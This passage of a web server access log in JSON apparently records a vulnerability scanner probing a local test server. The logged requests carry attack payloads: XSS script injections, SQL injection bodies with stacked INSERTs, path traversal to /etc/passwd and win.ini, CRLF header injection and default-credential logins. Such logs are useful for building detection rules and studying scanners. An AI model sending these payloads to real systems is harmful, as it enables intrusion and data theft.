/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicletitle\x22\x0D\x0A\x0D\x0ATest\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22brandname\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22vehicalorcview\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22priceperday\x22\x0D\x0A\x0D\x0A500\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22fueltype\x22\x0D\x0A\x0D\x0APetrol\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22modelyear\x22\x0D\x0A\x0D\x0A2022\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22seatingcapacity\x22\x0D\x0A\x0D\x0A5\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img1\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img2\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img3\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img4\x22; filename=\x22test.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22img5\x22; filename=\x22\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv\x0D\x0AContent-Disposition: form-data; name=\x22submit\x22\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundarypWqYipqU21aYgccv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/post-avehical.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'29KFpWkUyiO7XoSCj2UotjnpKFw'); INSERT INTO extra_field_options(option_value) VALUES ('29KFpWkUyiO7XoSCj2UotjnpKFw'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '29KFpWkUyiO7XoSCj2UotjnpKFw', 16,0) ON DUPLICATE KEY UPDATE tag='29KFpWkUyiO7XoSCj2UotjnpKFw', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /get_dkey.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-app.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KFpalyxYCKvnV0wFMU1gmHowi/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test') or 1=1 -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?a=display&templateFile=README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KFpalyxYCKvnV0wFMU1gmHowi/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt 